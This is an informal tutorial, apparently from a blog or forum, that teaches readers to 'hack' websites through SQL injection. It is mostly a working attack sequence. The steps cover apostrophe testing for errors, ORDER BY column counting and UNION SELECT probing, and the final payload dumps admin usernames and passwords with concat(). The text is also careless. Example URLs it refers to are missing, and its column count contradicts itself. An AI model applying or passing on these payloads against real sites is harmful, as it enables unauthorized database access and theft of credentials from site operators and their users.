Now we are going to learn how to hack the sites which is vulnerable to Sql injection.So lets begin
To check if the site is vulnerable to Sql injection first check the url if it is like this
To check the vulnerbility type appostrophy at the end of url so it will become like this
On hitting enter if you see this text on page
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right etc.
Then the website is vulnerable to this attack
To find number of columns we use statement ORDER BY (tells database how to order the result). In order to use, we do increment until we get an error.
http://www.site.com/news.php?id=7 order by 1 -- no error
http://www.site.com/news.php?id=7 order by 2 -- no error
http://www.site.com/news.php?id=7 order by 3 – error
so it means the site has 2 columns because we got error on 3th one.
Our next is step is to check for union function. This is because with union function we can select more data in one statement only.
http://www.site.com/news.php?id=7 union all select 1,2
Till 2 because we discoverd the no of column was 2 so lets move on
If we see some numbers on screen, i.e. 1 or 2 that means the UNION works
This is for MySQL version less than 5
http://www.site.com/news.php?id=7 union all select 1,2,3 from admin
We see number 2 on the screen like before. Now we know that table admin exists. Now to check column names we craft a query
http://www.site.com/news.php?id=7 union all select 1,2,username from admin
We get username displayed on screen
Now to check for the column password
http://www.site.com/news.php?id=7 union all select 1,2,password from admin
If we got successful, we will see password on the screen. It can be in plain text or hash depending on how the database has been setup ?. Now we must complete the query. For that we can use concat() function (it joins strings
http://www.site.com/news.php?id=7 union all select 1,2,concat(username,0x3a,password)from admin
Note that we put 0x3a, its hex value for so 0x3a is hex value for colon
Now we get displayed username: password on screen